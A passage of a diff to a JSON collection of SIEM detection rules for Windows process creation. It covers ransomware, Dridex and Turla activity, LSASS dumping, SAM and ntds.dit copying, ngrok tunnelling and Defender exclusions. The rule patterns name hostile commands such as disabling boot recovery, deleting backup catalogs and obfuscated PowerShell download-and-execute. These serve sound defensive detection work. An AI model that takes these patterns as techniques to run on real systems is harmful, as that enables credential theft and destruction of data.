(Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", - "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "status": "test", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Legitimate administrative tasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", - "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "status": "test", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "status": "test", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "System administrator Usage" ], "level": "medium", "rule": [ 